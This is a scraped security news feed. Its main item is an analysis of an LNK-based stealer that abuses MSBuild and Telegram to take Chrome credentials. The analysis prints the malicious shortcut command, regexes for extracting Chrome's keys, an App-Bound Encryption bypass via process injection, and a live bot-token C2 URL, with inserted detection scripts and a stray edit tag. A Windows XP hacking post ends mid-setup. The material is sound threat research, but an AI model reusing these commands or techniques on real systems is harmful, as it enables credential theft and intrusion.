Additionally, Cyble offers an AI-driven threat intelligence platform that helps organizations stay protected from cybercriminals by providing continuous monitoring, actionable insights, and timely alerts about vulnerabilities and cyber risks. With technologies such as Cyble Vision, Cyble empowers businesses, federal agencies, and individuals to strengthen their cybersecurity posture.

By leveraging Cyble's tools for vulnerability management, dark web monitoring, and attack surface management, organizations can better protect sensitive data and critical infrastructure from exploitation.

The post CISA Adds New Vulnerabilities to Known Exploited Vulnerabilities Catalog – Critical Updates Required appeared first on Cyble.

by CYBLE

Compensations for scam victims, and millionaires losing their family to COVID-19: read on to learn about the types of "Nigerian" spam one could come across in 2024.

by Securelist

The Trump administration is scrutinizing the AI app, Italy and Taiwan have banned it, and companies have blocked it.

by Cybersecurity Dive

Learn how to build and customize grid-based GUIs in PowerShell using Windows Presentation Foundation.

by ITPro Today

Cyberattacks using ransomware spiked in the second half of the year, but fewer victims paid up.

by Cybersecurity Dive

Public Certificate Authorities (CAs) play a crucial role in maintaining internet trust, but not all CAs meet the highest standards. True CA leadership is built on three pillars: ethical excellence, which prioritizes public trust over corporate interests; technical excellence, which ensures security through automation and innovation; and intellectual excellence, which drives industry thought leadership. Sectigo exemplifies these principles, leading the way in responsible CA practices, transparency, and security advancements.

by Sectigo

Researchers at Kaspersky have uncovered a sophisticated malware campaign dubbed SparkCat, which infects both Android and iOS applications to steal cryptocurrency wallet recovery phrases. The malware, embedded in apps available on Google Play and Apple's App Store, uses Optical Character Recognition (OCR) to scan image galleries for sensitive information. This marks the first time a … The post "SparkCat" Malware Found in Google Play and Apple App Store appeared first on CyberInsider.

by Cyber Insider

The company agreed to cover expenses related to recovery from the December cyberattack.

by Cybersecurity Dive

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog by adding several new vulnerabilities that have been actively exploited by cybercriminals.

These vulnerabilities, found in widely used software products, pose cybersecurity risks, especially to federal enterprises and critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which can have severe consequences for the security of affected systems.

Overview of the New Known Exploited Vulnerabilities

CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability

The first vulnerability, CVE-2024-45195, is a critical flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is associated with forced browsing, which allows attackers to bypass security restrictions by directly accessing specific URLs, potentially revealing sensitive data.

Discovered in Apache OFBiz versions earlier than 18.12.16, this vulnerability could enable unauthorized access to various website sections, depending on the implementation of weak authorization mechanisms. Attackers may exploit this flaw to escalate privileges and gain access to sensitive data, including private user information or other confidential details.

The CVE-2024-45195 vulnerability has been included in the CISA Known Exploited Vulnerabilities Catalog because of its active exploitation, which makes it critical for organizations using Apache OFBiz to upgrade their software to version 18.12.16 or later.

CVE-2024-29059: Microsoft .NET Framework Information Disclosure

Another serious vulnerability added to the Known Exploited Vulnerabilities Catalog is CVE-2024-29059, affecting the Microsoft .NET Framework. This information disclosure vulnerability enables attackers to gain access to sensitive information from systems running older versions of .NET Framework, such as 4.8, 3.5, and 4.7.2.

This flaw can be exploited by attackers leveraging weaknesses in error handling within the system. With a CVSS score of 7.5 (High), it poses a significant risk to organizations using Windows 10 or Windows Server versions, where the CVE-2024-29059 vulnerability is prevalent.

Given its potential impact, CISA has listed CVE-2024-29059 in its catalog of known exploited vulnerabilities, urging organizations to quickly apply patches or updates to protect their systems from data exposure and potential breaches.

CVE-2018-9276: Paessler PRTG Network Monitor OS Command Injection

The CVE-2018-9276 vulnerability relates to a critical flaw found in Paessler PRTG Network Monitor, a tool widely used for IT network monitoring. This vulnerability, identified in versions prior to 18.2.39, is a command injection issue that allows attackers with administrator privileges to inject operating system commands into the system.

By exploiting this flaw, attackers could execute arbitrary commands not only on the PRTG server but also on connected network devices, potentially compromising entire network infrastructures. For organizations relying on PRTG to monitor their network health, this is a cybersecurity concern.

The vulnerability's inclusion in the Known Exploited Vulnerabilities Catalog reflects the urgent need for PRTG users to update their systems to versions that resolve this issue.

CVE-2018-19410: Paessler PRTG Network Monitor Local File Inclusion

Another vulnerability in Paessler's PRTG Network Monitor, CVE-2018-19410, is a Local File Inclusion (LFI) flaw. This vulnerability allows unauthenticated attackers to bypass security restrictions and escalate their privileges by crafting malicious HTTP requests. Attackers can exploit this flaw to create new users with administrator privileges or read-write access, thereby gaining control over the system.

Discovered in versions of PRTG prior to 18.2.40.1683, CVE-2018-19410 has been exploited in active attacks, making it a high-priority target for patching. By exploiting this vulnerability, attackers can manipulate the network monitoring system and access sensitive data, which could lead to serious security breaches.

Conclusion

The vulnerabilities listed in the Known Exploited Vulnerabilities Catalog, such as CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, highlight the importance of proactive vulnerability management. Organizations must regularly patch their systems to avoid exploitation, especially those handling sensitive data or critical infrastructure. Using advanced tools like Cyble can further strengthen defenses by providing real-time monitoring and insights.

by The Cyber Express

Security researchers at WatchTowr have uncovered a widespread security risk arising from abandoned Amazon S3 storage buckets, demonstrating how attackers could have leveraged them to distribute malicious software updates, manipulate infrastructure deployments, and compromise networks across government, military, financial, and cybersecurity sectors. The scale of the issue, the researchers argue, could have made past supply … The post Forgotten S3 Buckets Risked Largest-Ever Supply Chain Attack appeared first on CyberInsider.

by Cyber Insider

A manufacturing company was hit with Akira ransomware in the early hours of the morning. See how Barracuda Managed XDR blocked the attack.

by Barracuda

A global phishing campaign is actively exploiting a legacy Microsoft authentication system to steal user credentials and bypass multi-factor authentication (MFA), targeting over 150 organizations.

by Hackread

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-45195 (CVSS score: 7.5/9.8) - A forced browsing vulnerability in Apache OFBiz that allows a remote attacker to obtain unauthorized

by The Hacker News

Overview

The Australian Cyber Security Centre (ACSC), part of the Australian Signals Directorate (ASD), has shared new information on cyber threats targeting individuals and organizations across the country. The ACSC has warned that Australians must remain vigilant and take immediate action to protect their personal and professional data.

Over the past few years, Australia has seen an alarming rise in cyberattacks, including phishing, ransomware, and denial-of-service attacks, which are impacting both businesses and private citizens. These cyberattacks often target vulnerabilities in online platforms and devices, aiming to steal sensitive information, disrupt services, or even demand ransom payments.

The ACSC has highlighted the rise of email scammers impersonating trusted organizations, such as the ACSC itself. These scammers often attempt to deceive users into disclosing personal details, such as passwords, bank information, or credit card numbers.

The Danger of Email Scammers

One of the most concerning tactics employed by cybercriminals is impersonating government agencies like the ACSC and the ASD. Email scammers frequently send fraudulent emails, often mimicking the ACSC's official logo and email signature, to create a sense of urgency and pressure individuals into responding.

These scam messages often contain threats, such as warning users that their devices have been compromised or that their online activities are under investigation for illegal behavior. The scammers may ask recipients to click on dangerous links or download malicious software, further compromising their security.

To avoid falling victim to such scams, the ACSC recommends that anyone who receives an unsolicited message claiming to be from the center should be cautious and verify its authenticity. If you suspect an email or phone call to be fraudulent, do not engage with the sender. Instead, contact the ACSC directly at 1300 CYBER1 to confirm whether the communication was legitimate.

What to Do if You Suspect a Scam

If you believe that you have received a scam email or phone call, the ACSC recommends following these steps to ensure your security:

- Do not click on any links or download any attachments from unsolicited emails.
- If you've already clicked on a link or downloaded something suspicious, immediately contact the ACSC at 1300 CYBER1 for assistance.
- Report the scam to ScamWatch to help others avoid falling victim to similar scams.
- Block the sender of the suspicious email to prevent further contact.
- If you received a phone call, hang up and call the ACSC directly at 1300 CYBER1 to verify the legitimacy of the call.

The ACSC urges all Australians to exercise caution when dealing with unsolicited requests for personal information, especially when it involves urgent threats or promises of rewards. Cybercriminals often use a variety of tactics to manipulate individuals into giving up their sensitive data, which can lead to identity theft, financial loss, or further exploitation.

Conclusion

Cybersecurity awareness is crucial for both individuals and businesses in Australia to protect against cyberattacks. By following basic cybersecurity practices, such as using strong passwords, enabling two-factor authentication, and keeping software up to date, Australians can reduce their risk of falling victim to cybercriminals.

The ACSC continues to offer vital resources and expert guidance to help secure networks and data, and is always ready to assist those affected by cybercrime. Staying informed, being proactive, and utilizing the ACSC's support is key to protecting against cyber threats and ensuring a secure digital environment. To get help or report suspicious activity, Australians are encouraged to contact the ACSC at 1300 CYBER1.

The post Australian Cyber Security Centre Urges Immediate Action to Combat Email Scammers appeared first on Cyble.

by CYBLE

The Nigerian government has intensified its crackdown on financial fraud and cybercrime, arresting over 1,000 individuals in the past year and securing 152 convictions related to fraud and online scams. The post Nigeria Touts Cyber Success While African Cybercrime Surges appeared first on ZENDATA Cybersecurity.

by Zendata

The Taiwanese hardware maker says it has no plans to patch the flaws impacting legacy router models.

by TechCrunch

Google has released the February 2025 Android security updates, addressing 48 vulnerabilities, notably a high-severity zero-day flaw in the Android kernel's USB Video Class driver. The post Google fixes Android kernel zero-day exploited in attacks appeared first on ZENDATA Cybersecurity.

by Zendata

Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it. The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors. The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code. The malware is capable of bypassing Chrome’s App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files. Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection. The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution. The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels. Overview Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present. This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches Microsoft Build Engine (MSBuild.exe) to execute embedded C# code from the XML file. The malicious code operates within the MSBuild.exe process, deploying different components based on the system''s architecture. Upon further execution, the malware establishes communication with the TA via the Telegram Web API and listens for commands from the attacker. 
Depending on the specific commands received, the malware can perform several malicious activities. These include bypassing Chrome’s app-bound encryption to steal a secret encryption key, deploying a custom stealer, and exfiltrating sensitive user data from the Chrome browser, such as cookies, login data, and account login data. Additionally, the malware allows the TA to modify the Telegram bot ID and chat ID as needed, providing flexibility in managing their communication channels. Furthermore, it can execute arbitrary commands through the Windows Command Prompt, allowing the TA to perform additional malicious activities on the infected system. To avoid detection, the malware employs a double injection technique—Process Injection and Reflective DLL Injection—to stealthily execute malicious code in memory without leaving traces on the disk, making it harder for traditional security solutions to detect. Infection chain: The figure below shows the infection chain of this attack. Figure 1 - Infection chain Technical Analysis Upon analyzing the ZIP file - “CV Telesale Trần Huỳnh Cẩm Duyên.zip” – we found that it contains a malicious LNK file “CV_Dinh Thi Thuy.pdf.lnk” and an XML project file “logo.png”. The attack begins with this malicious .LNK file - disguised with a .pdf extension - to deceive the user into opening it. Based on the filename, it is evident that TA is targeting individuals or organizations in Vietnam, primarily within the Telemarketing or Sales sectors. 
When the user opens the LNK file, the command in the shortcut's target is executed via the command prompt:

cmd.exe /c tar -xf Scan_document.zip|copy logo.png %temp%\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "%comspec% /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A %temp%\darkmoon.xml" /f &&start ~logo.png

Since "Scan_document.zip" was not found during analysis, the original ZIP archive "CV Telesale Trần Huỳnh Cẩm Duyên.zip" may have contained it. Its absence does not break the chain: the copy is joined to the tar step with a pipe rather than &&, so it runs whether or not tar succeeds.

The command copies "logo.png" to "%temp%\darkmoon.xml" and creates a scheduled task named "Darkmoon_Gaming" that runs every 15 minutes. The task action is %comspec% /c powershell -nop -w h (no profile, hidden window), which uses Start-Process to launch the 64-bit .NET Framework 4 MSBuild.exe with the copied XML file as its argument. Finally, the command displays a fake error message to make the user believe the PDF failed to open.

Figure 2 - Fake error message

Once the scheduled task fires, MSBuild.exe loads the project from "%temp%\darkmoon.xml". As execution begins, the embedded C# code performs an initial system check by counting processor cores. If the system has fewer than two CPU cores, execution halts immediately and returns true, which keeps the malware from running in the low-resource virtual machines often used for malware analysis.

Figure 3 - Scheduled Task

If execution continues, the malware identifies the system architecture (32-bit or 64-bit) and locates the default installation path of MSBuild.exe. It then decrypts the malicious components at runtime using Base64 decoding followed by XOR decryption with hardcoded keys embedded in the project file. This keeps the payloads obfuscated in their static form, making them harder for signature-based tools to detect.
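The chain above (cmd.exe copying the project file, schtasks creating a task, hidden PowerShell starting MSBuild.exe on an XML file in %temp%) leaves a distinctive trail in process-creation telemetry. The following is an added hunting example, not code from the Cyble report: it runs four rules over constructed Sysmon-style events (parent image, image, command line). Event 1 reuses the LNK command line quoted above with %temp% unexpanded; events 2 to 4 are what the rest of the chain would look like after expansion for a hypothetical user "alice"; events 5 and 6 are benign look-alikes that must not fire.

```python
"""Hunt for the LNK -> schtasks -> hidden PowerShell -> MSBuild.exe chain in
process-creation telemetry (Sysmon Event ID 1 style fields). Added example, not
Cyble's code; the events are constructed, only event 1's command line is the one
quoted in the report."""
import re
from pathlib import PureWindowsPath

# Temp directory references, unexpanded (%temp%) or expanded.
TEMP_RE = re.compile(r"%temp%|\\appdata\\local\\temp\\", re.I)
# PowerShell started without a profile and with a hidden window.
NOPROFILE_RE = re.compile(r"(?<![\w-])-(nop|noprofile)\b", re.I)
HIDDEN_RE = re.compile(r"(?<![\w-])-(w|windowstyle)\s+h(idden)?\b", re.I)
# Script hosts that have no business launching a build tool.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path):
    return PureWindowsPath(path.strip('"')).name.lower()


def rule_schtasks_runs_msbuild(ev):
    """A scheduled task is being created whose action launches MSBuild.exe."""
    cl = ev["cmdline"].lower()
    return "schtasks" in cl and "/create" in cl and "msbuild.exe" in cl


def rule_hidden_powershell_to_msbuild(ev):
    """powershell -nop -w h ... MSBuild.exe: no profile, hidden window, build tool as target."""
    cl = ev["cmdline"]
    return ("powershell" in cl.lower() and "msbuild.exe" in cl.lower()
            and NOPROFILE_RE.search(cl) is not None and HIDDEN_RE.search(cl) is not None)


def rule_msbuild_project_in_temp(ev):
    """MSBuild.exe told to build a project file that lives in a temp directory."""
    return _basename(ev["image"]) == "msbuild.exe" and TEMP_RE.search(ev["cmdline"]) is not None


def rule_msbuild_spawned_by_script_host(ev):
    """MSBuild.exe whose parent is cmd/powershell/wscript rather than an IDE or build agent."""
    return _basename(ev["image"]) == "msbuild.exe" and _basename(ev["parent"]) in SCRIPT_HOSTS


RULES = (rule_schtasks_runs_msbuild, rule_hidden_powershell_to_msbuild,
         rule_msbuild_project_in_temp, rule_msbuild_spawned_by_script_host)


def hunt(events):
    """Return {event id: [matching rule names]} for the events that fire at least one rule."""
    hits = {}
    for ev in events:
        matched = [rule.__name__ for rule in RULES if rule(ev)]
        if matched:
            hits[ev["id"]] = matched
    return hits


MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP_XML = r"C:\Users\alice\AppData\Local\Temp\darkmoon.xml"

# Constructed telemetry: events 1-4 are the chain from the report as it would appear
# after %temp% expansion; events 5 and 6 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c tar -xf Scan_document.zip|copy logo.png %temp%\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "%comspec% /c powershell -nop -w h Start-Process -N -F ' + MSBUILD + r' -A %temp%\darkmoon.xml" /f &&start ~logo.png'},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\\Windows\\system32\\cmd.exe /c powershell -nop -w h Start-Process -N -F ' + MSBUILD + " -A " + TEMP_XML + '" /f'},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell -nop -w h Start-Process -N -F " + MSBUILD + " -A " + TEMP_XML},
    {"id": 4, "parent": PS, "image": MSBUILD,
     "cmdline": '"' + MSBUILD + '" ' + TEMP_XML},
    {"id": 5, "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": MSBUILD, "cmdline": '"' + MSBUILD + r'" C:\src\app\app.csproj /t:Build'},
    {"id": 6, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn NightlyBackup /tr "C:\Tools\backup.exe" /f'},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

Each rule is deliberately narrow so that a single benign build (event 5) or an ordinary scheduled task (event 6) stays quiet; it is the combination of hits across events 1 to 4 on one host within a few seconds that makes the chain obvious.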
The malicious components are a .NET executable that receives commands from the Threat Actor, an injector that delivers a payload capable of bypassing App-Bound Encryption, and a custom stealer that targets Chrome-related files.

Figure 4 - Decrypt using XOR and calling the InvokeMember function

On a 64-bit machine, MSBuild.exe invokes the decrypted .NET file directly in memory with predefined parameters, so the payload is never written to disk. The .NET payload takes the following parameters:

- Telegram bot ID: establishes communication with the TA's Telegram bot for command-and-control (C2).
- Chat ID: the chat instance used to send system details and receive commands.
- Encrypted custom stealer: steals Cookies, Login Data, and Login Data for Accounts from Google Chrome, along with the encrypted secret key.
- Encrypted injector: uses the double injection technique to place a reflective DLL loader in memory; the loader then loads a malicious DLL that bypasses Chrome's App-Bound Encryption.

Figure 5 - InvokeMethod with its Telegram configuration

The malware first collects the victim's username and sends it to the TA's Telegram bot using the sendMessage method. To obfuscate the data, it replaces backslashes (\) with "+=...=+" and wraps the message in <code> and </code> HTML tags, as shown below.

Figure 6 - Sends victim's username via Telegram bot using the sendMessage API

After sending this information, the malware enters an infinite loop, polling for a response from the Telegram bot. Upon receiving a command, it parses the input and executes the corresponding action:

Command | Action
1 | Sends the victim's system name to the Telegram bot.
34 | The command carries the delimiter string "+=...=+". The malware splits the command on this delimiter and counts the segments: with exactly three segments it runs the injector to bypass Chrome's App-Bound Encryption, extract the encryption key and send it to the attacker via the Telegram bot; with four segments it runs the stealer payload to collect and exfiltrate sensitive Chrome files.
91 | Updates the Telegram bot ID and chat ID based on C&C instructions.
45 | Unknown.
Any other input | Executes the received command using cmd.exe.

Stealer Component

Upon execution, the stealer scans the Chrome profile directory "%LOCALAPPDATA%\Google\Chrome\User Data\Default" for "Login Data", "Cookies" and "Login Data for Accounts". These files contain saved passwords, cookies, 2FA tokens, synced device credentials, autofill data, and other sensitive user information. It also extracts Chrome's encrypted secret key from the "Local State" file using the regex pattern:

\s*.*?(?="encrypted_key)"encrypted_key"\s*:\s*"(?<encKey>.*?)"

The extracted key is decrypted with the CryptUnprotectData Win32 API (it is DPAPI-protected for the current user, so any process running as that user can unwrap it) and, together with the stolen files, is archived in the %temp% directory for exfiltration. This decrypted key unlocks stored passwords and other browser data that are still encrypted under the older, non-app-bound scheme.

Figure 7 - Data Staged for exfiltration

Injector Component

Starting with Chrome 127, App-Bound Encryption was introduced to protect cookies by tying the encryption key to the browser's identity, so that only Chrome can unwrap it. Later versions extended this protection to other sensitive data such as passwords and credentials, blocking decryption by other applications running as the user. To get around this, the injector component is hardcoded to target chrome_proxy.exe, located in the "\Google\Chrome\Application" directory.
It launches chrome_proxy.exe in a suspended state using the CreateProcess API with dwCreationFlags set to CREATE_SUSPENDED. While the process is suspended, the injector decrypts a payload in memory that functions as a reflective loader. This loader is injected into chrome_proxy.exe and uses reflective DLL injection to load the embedded payload "DumpChromeKeyLoader.dll", evading traditional antivirus detection. This is the double injection technique: the first injection places the reflective loader, and the second loads the final payload into the target process. The choice of host process is not incidental: Chrome's elevation service validates that the process asking for the key is a genuine Chrome binary from the install directory, so running inside chrome_proxy.exe passes that check.

Figure 8 - Process Injection

After injection, DumpChromeKeyLoader.dll locates the "Local State" file in "AppData\Local\Google\Chrome\User Data". This file holds Chrome configuration and security data, including app_bound_encrypted_key, which protects sensitive information such as cookies and saved passwords. The DLL uses the regex pattern

\s*.*?(?="app_bound_encrypted_key)"app_bound_encrypted_key"\s*:\s*"(?<encKey>.*?)"

to find the app_bound_encrypted_key entry and capture the base64 value that follows it.

Figure 9 - RegEx pattern

After extracting the encrypted key, the malware calls the DecryptData method of the GoogleChromeElevationService to obtain the decrypted key. Because the call comes from inside a Chrome binary, the service returns the key, defeating App-Bound Encryption and exposing protected data including saved passwords and cookies. Once decrypted, the key is saved to "%temp%\ei5m013o.0fh" for exfiltration.

Figure 10 - Decrypting Chrome key

Command Execution

The Threat Actor can also execute commands via the command prompt.
If the TA issues a command that does not match one of the predefined commands, it is executed as "cmd.exe /c <command>" in hidden mode, and the output is sent to the TA through the Telegram Web API, as shown below.

Figure 11 - Command execution

Exfiltration

After executing each command, the malware transmits the output or any errors to the TA via the Telegram Web API. This real-time feedback lets the attacker monitor results and adjust subsequent commands.

Figure 12 - Exfiltration

Conclusion

This attack leverages fileless execution, scheduled task persistence, and Telegram-based communication to evade detection while stealing sensitive data. By abusing MSBuild.exe and using a double injection technique, the malware executes directly in memory, making it harder to detect. Its ability to bypass Chrome's App-Bound Encryption and extract credentials further strengthens its impact. The use of the Telegram Web API for exfiltration and dynamic bot ID switching gives the attacker continued control over infected systems.
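Two things an incident responder can take from this design: the C2 channel is ordinary HTTPS to api.telegram.org with the bot ID and token in the URL path, and the beacon text is only lightly obfuscated. The block below is an added example, not Cyble's code or the malware's: it extracts bot IDs from constructed proxy log lines, flags a host that switches bot IDs (what command 91 enables), and reverses the "+=...=+" substitution and <code> wrapping on a constructed sendMessage body. The log lines, IP addresses, bot tokens and body are all made up.

```python
"""Spot Telegram Bot API traffic in proxy logs, group it by bot ID so a mid-campaign bot
switch stands out, and undo the message obfuscation the report describes (backslash ->
'+=...=+', wrapped in <code> tags). Added example, not Cyble's code; the log lines, bot
tokens and request body are constructed."""
import re
from urllib.parse import parse_qs, urlencode

BOT_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+)")
DELIM = "+=...=+"

# Constructed proxy log: timestamp, source IP, process, URL, status.
PROXY_LOG = """\
2025-02-06T10:00:01Z 10.0.0.5 MSBuild.exe https://api.telegram.org/bot1000000001:AAExampleTokenOne/sendMessage 200
2025-02-06T10:00:16Z 10.0.0.5 MSBuild.exe https://api.telegram.org/bot1000000001:AAExampleTokenOne/getUpdates 200
2025-02-06T10:00:31Z 10.0.0.7 chrome.exe https://www.example.com/ 200
2025-02-06T10:15:02Z 10.0.0.5 MSBuild.exe https://api.telegram.org/bot1000000002:AAExampleTokenTwo/sendMessage 200
"""


def telegram_hits(log_text):
    """One record per request to the Bot API: who sent it, which bot, which method."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        m = BOT_URL_RE.search(parts[3])
        if m:
            hits.append({"ts": parts[0], "src": parts[1], "proc": parts[2],
                         "bot_id": m.group("bot_id"), "method": m.group("method")})
    return hits


def bot_rotation(hits):
    """Hosts that talked to more than one bot ID (command 91 changes the bot mid-campaign)."""
    seen = {}
    for h in hits:
        seen.setdefault(h["src"], set()).add(h["bot_id"])
    return {src: sorted(ids) for src, ids in seen.items() if len(ids) > 1}


def decode_beacon(body):
    """Recover chat_id and the cleartext message from a captured sendMessage body."""
    fields = parse_qs(body)
    text = fields.get("text", [""])[0]
    text = re.sub(r"</?code>", "", text)
    return fields.get("chat_id", [""])[0], text.replace(DELIM, "\\")


# Constructed request body in the shape the report describes: DOMAIN\user with the
# backslash swapped for the delimiter and the whole message inside <code> tags.
SAMPLE_BODY = urlencode({"chat_id": "777", "parse_mode": "HTML",
                         "text": "<code>CORP" + DELIM + "alice</code>"})

if __name__ == "__main__":
    hits = telegram_hits(PROXY_LOG)
    print(len(hits), "Bot API requests; rotation:", bot_rotation(hits))
    print(decode_beacon(SAMPLE_BODY))
```

Blocking api.telegram.org outright is the blunt fix; where that is not acceptable, a build tool such as MSBuild.exe talking to the Bot API at all is the signal worth alerting on, and the bot ID in the URL is the pivot for finding other infected hosts.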
MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file uses PowerShell to launch MSBuild.exe
Execution (TA0002) | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | The LNK file uses cmd.exe, and the TA uses cmd.exe for command execution
Execution (TA0002) | User Execution: Malicious File (T1204.002) | Tricks the user into opening a .LNK file
Persistence (TA0003) | Scheduled Task/Job: Scheduled Task (T1053.005) | A scheduled task executes the payload every 15 minutes
Privilege Escalation (TA0004) | Access Token Manipulation: Token Impersonation/Theft (T1134.001) | Attempts to impersonate the system token during execution
Defense Evasion (TA0005) | Obfuscated Files or Information: Compile After Delivery (T1027.004) | MSBuild.exe is used to compile and execute malicious C# code
Defense Evasion (TA0005) | Deobfuscate/Decode Files or Information (T1140) | Base64 decoding and XOR decryption are used to recover the payloads
Credential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Accesses Google Chrome user files containing credentials, tokens, session keys, cookies and other sensitive information
Collection (TA0009) | Data Staged: Local Data Staging (T1074.001) | The collected data is compressed into an archive and staged for exfiltration
Collection (TA0009) | Archive Collected Data: Archive via Library (T1560.002) | The Cookies and Login Data files are archived into the %temp% directory
Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | The malware communicates with the TA's Telegram bot over HTTPS, sending system information and receiving commands
Exfiltration (TA0010) | Exfiltration Over Command and Control Channel (T1041) | The stolen data is sent using the Telegram Web API

Recommendations

- Train users to recognize suspicious file extensions (a .pdf.lnk double extension, for example) and to avoid opening files from untrusted sources.
- Implement strict email filtering to block potentially harmful attachments.
</gr_repl>
- Use application whitelisting to prevent the execution of unauthorized files, particularly .LNK and .exe files. Note that MSBuild.exe is a signed Microsoft binary, so an allow-list based on publisher alone will not stop this chain; restrict it by path or to build hosts that need it.
- Enforce strict control over file execution paths and extensions.
- Deploy endpoint detection and response (EDR) tools that monitor and block suspicious activities such as reflective DLL injection or the creation of scheduled tasks by unauthorized processes.
- Keep operating systems, browsers, and other software up to date with the latest security patches to reduce the risk of exploits targeting known vulnerabilities.
- Enforce the principle of least privilege so that users and processes have only the access they need, limiting the malware's ability to escalate privileges and reach sensitive data.

Indicators of Compromise (IoCs)

Indicator | Type | Description
4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3 | SHA-256 | CV Telesale Trần Huỳnh Cẩm Duyên.zip
be210a706826056a9284d41ec13070d46a1465ea8eef8b8ae66c548dba7d3fd1 | SHA-256 | CV_Dinh Thi Thuy.pdf.lnk
94227bd384cbc499c7b8c43a2cb67a4e866a9ab0e59b3433271fe3d8a98f809b | SHA-256 | logo.png
hxxps://api.telegram.org/bot7627703707:AAH6TL7Iw6muIVgNjoYcp0OkKmYFg2S1fVE/sendMessage | URL | Telegram Web API endpoint used for C2

The post Stealthy Attack: Dual Injection Undermines Chrome's App-Bound Encryption appeared first on Cyble.

by CYBLE

The International Civil Aviation Organization (ICAO) is investigating a data breach affecting system and employee security. The International Civil Aviation Organization (ICAO), a specialized agency of the United Nations, is investigating a significant data breach that has raised concerns about the security of its systems and its employees' data. In the updated statement published by ICAO, […]

by Security Affairs

Kaspersky experts discover iOS and Android apps infected with the SparkCat crypto stealer in Google Play and the App Store. It steals crypto wallet data using an OCR model.

by Securelist

Organizations continue to be at high risk from cybercrime in Africa, despite law enforcement takedowns of cybercriminal syndicates in Nigeria and other African nations.

by Dark Reading

Explores IVR penetration testing methodologies, common vulnerabilities, and strategies to secure these critical systems against modern threats.

by Bishop Fox

Managing digital certificates in high-volume environments is complex, increasing the risk of outages, compliance failures, and security breaches. Automated Certificate Lifecycle Management (CLM) streamlines discovery, issuance, renewal, and revocation—reducing human errors, enhancing security, and cutting operational costs. By preventing downtime, improving compliance, and optimizing IT resources, automated CLM helps organizations maintain trust, reduce risk, and achieve significant cost savings.

by Sectigo

Another weekend project on the list, and this time, I am curious to find out how easy it is for a Windows XP operating system to be hacked.

Windows XP has reached End of Life for security updates since Apr 8, 2014, as quoted by Microsoft.

I've still been wondering if it's an exaggeration that you shouldn't be running this OS at all or if there's a simple chance to run it and not get hacked.

I've gotten a virtual machine set up with a Service Pack 3 copy of Windows XP Professional alongside my penetration testing operating system, Kali Linux.

File and Printer Sharing

File and Printer Sharing inside the Control Panel was already enabled alongside the Server service after checking the services.msc list within the operating system.

However, I still wasn't able to find an open port for at least one thing after scanning the machine with a basic nmap command.

Not so fast, not yet.

Doesn't mean we're unhackable right now. We're still at risk if we open a malicious PDF or EXE (executable) file.

This OS is loaded with CVEs.

Windows Firewall

After adding an exception within the Windows Firewall for the File and Printer Sharing activity, then port 445, SMB was exposed to the local network.

Running the following in Kali Linux, I was then able to observe port 445 with multiple vulnerabilities:

nmap -Pn -A --script=vuln IP -vv

Windows XP port scan on the Local Network

I drifted my attention to the MS08-067 NET API vulnerability, which enables remote code execution (RCE).

Setting up Metasploit to test the vulnerability, you can execute the following:

